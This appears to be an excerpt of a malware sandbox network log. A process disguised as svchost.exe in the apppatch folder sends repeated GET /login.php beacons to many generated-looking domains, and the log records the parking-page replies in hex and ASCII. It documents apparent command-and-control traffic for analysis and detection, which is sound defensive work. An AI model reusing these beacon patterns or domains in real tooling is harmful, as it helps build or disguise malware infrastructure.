                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=c3e1f0e6e0584abd0bc83df95f47ca55|66.23.206.109|1731345917|1731345917|0|1|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            26192.168.2.1064066199.59.243.227807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.306725025 CET350OUTGET /login.php?subid1=20241112-0425-1788-b22b-1a13d8aaa54b HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww25.lyxynyx.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1731345917.6190825
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.733654976 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:25:18 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1230
                                                                                                                                                                                                            x-request-id: ed2afce1-d041-4af4-9384-1498c5b0f22d
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HAogJtDpOH16p/FqYdcQhKLKPazJH5rZI/wib/rsZ1jGaaSbU5YopXYy+dKaUFMHEQcbbWISvq6Gyhxpr6Tg7A==
                                                                                                                                                                                                            set-cookie: parking_session=ed2afce1-d041-4af4-9384-1498c5b0f22d; expires=Mon, 11 Nov 2024 17:40:18 GMT; path=/
                                                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 41 6f 67 4a 74 44 70 4f 48 31 36 70 2f 46 71 59 64 63 51 68 4b 4c 4b 50 61 7a 4a 48 35 72 5a 49 2f 77 69 62 2f 72 73 5a 31 6a 47 61 61 53 62 55 35 59 6f 70 58 59 79 2b 64 4b 61 55 46 4d 48 45 51 63 62 62 57 49 53 76 71 36 47 79 68 78 70 72 36 54 67 37 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HAogJtDpOH16p/FqYdcQhKLKPazJH5rZI/wib/rsZ1jGaaSbU5YopXYy+dKaUFMHEQcbbWISvq6Gyhxpr6Tg7A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.733697891 CET664INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                            Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWQyYWZjZTEtZDA0MS00YWY0LTkzODQtMTQ5OGM1YjBmMjJkIiwicGFnZV90aW1lIjoxNzMxMzQ1OTE4LCJwYWdlX3VybCI6I


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            27192.168.2.106406764.190.63.136807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.355942965 CET348OUTGET /login.php?sub1=20241112-0425-1706-a2c8-02526792f211 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww16.vofycot.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1731345917.8924867
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981504917 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:25:18 GMT
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            transfer-encoding: chunked
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RRjnQMnhlA3V1i3bEh29EhpkAlrnRBAUfJ2umOjIcPnFy0BAhbsnPAiBPZkhHdNcd2mCxkLBRJ8JZPz5F6iwxw==
                                                                                                                                                                                                            last-modified: Mon, 11 Nov 2024 17:25:18 GMT
                                                                                                                                                                                                            x-cache-miss-from: parking-7596689c44-jngxs
                                                                                                                                                                                                            server: Parking/1.0
                                                                                                                                                                                                            Data Raw: 34 46 35 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 52 52 6a 6e 51 4d 6e 68 6c 41 33 56 31 69 33 62 45 68 32 39 45 68 70 6b 41 6c 72 6e 52 42 41 55 66 4a 32 75 6d 4f 6a 49 63 50 6e 46 79 30 42 41 68 62 73 6e 50 41 69 42 50 5a 6b 68 48 64 4e 63 64 32 6d 43 78 6b 4c 42 52 4a 38 4a 5a 50 7a 35 46 36 69 77 78 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: 4F56<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RRjnQMnhlA3V1i3bEh29EhpkAlrnRBAUfJ2umOjIcPnFy0BAhbsnPAiBPZkhHdNcd2mCxkLBRJ8JZPz5F6iwxw==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and be
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981549025 CET1236INData Raw: 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20
                                                                                                                                                                                                            Data Ascii: st source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/pn
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981563091 CET1236INData Raw: 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e
                                                                                                                                                                                                            Data Ascii: line-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}but
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981575966 CET1236INData Raw: 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e
                                                                                                                                                                                                            Data Ascii: ont:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announceme
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981601000 CET848INData Raw: 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 20 61 7b 63 6f 6c
                                                                                                                                                                                                            Data Ascii: 10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-lin
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981616974 CET1236INData Raw: 6e 74 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 25 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 25 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61
                                                                                                                                                                                                            Data Ascii: nt-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-interactive-text{colo
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981630087 CET1236INData Raw: 39 39 39 7d 2e 62 74 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 35
                                                                                                                                                                                                            Data Ascii: 999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-si
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981642962 CET424INData Raw: 77 69 64 74 68 3a 32 36 70 78 3b 6c 65 66 74 3a 34 70 78 3b 62 6f 74 74 6f 6d 3a 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69
                                                                                                                                                                                                            Data Ascii: width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:f
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981657028 CET1236INData Raw: 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 56 65 72 64 61 6e 61 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 73 61 6e
                                                                                                                                                                                                            Data Ascii: y{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:10px}.container-conte
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.981673956 CET1236INData Raw: 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 6c 70 7b 6d 69 6e 2d
                                                                                                                                                                                                            Data Ascii: t-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-height:720px}.container-content--twot .container-content__c
                                                                                                                                                                                                            Nov 11, 2024 18:25:18.986552954 CET1236INData Raw: 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 77 65 62 61 72
                                                                                                                                                                                                            Data Ascii: _header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-blo


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            28192.168.2.106237364.225.91.73807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.867218018 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyhyg.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.416307926 CET816INHTTP/1.1 200 OK
                                                                                                                                                                                                            server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:25:20 GMT
                                                                                                                                                                                                            content-type: text/html
                                                                                                                                                                                                            content-length: 593
                                                                                                                                                                                                            last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                            etag: "63f68860-251"
                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            29192.168.2.106130072.52.179.174807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.162610054 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            30192.168.2.106130172.52.179.174807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:20.681967974 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            31192.168.2.105797452.34.198.229807908C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:24.806463003 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lygyvuj.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:25.491776943 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:25 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=0a88dfa3b6493a0c324de365a805e3ad|66.23.206.109|1731345925|1731345925|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            32192.168.2.105748144.221.84.10580
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:27.973712921 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyhiz.com
                                                                                                                                                                                                            Nov 11, 2024 18:25:28.402127981 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:25:28 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=91e6f4c6961727ea7e4b7793cd95b6ef|66.23.206.109|1731345928|1731345928|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            33192.168.2.1062042199.59.243.22780
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.548319101 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Cookie: parking_session=56c592c3-0730-4a19-aac9-be9b7f376588
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.986596107 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:25:29 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1094
                                                                                                                                                                                                            x-request-id: ad84e673-6c6c-470e-97b1-1710e1b74f69
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                            set-cookie: parking_session=56c592c3-0730-4a19-aac9-be9b7f376588; expires=Mon, 11 Nov 2024 17:40:29 GMT
                                                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
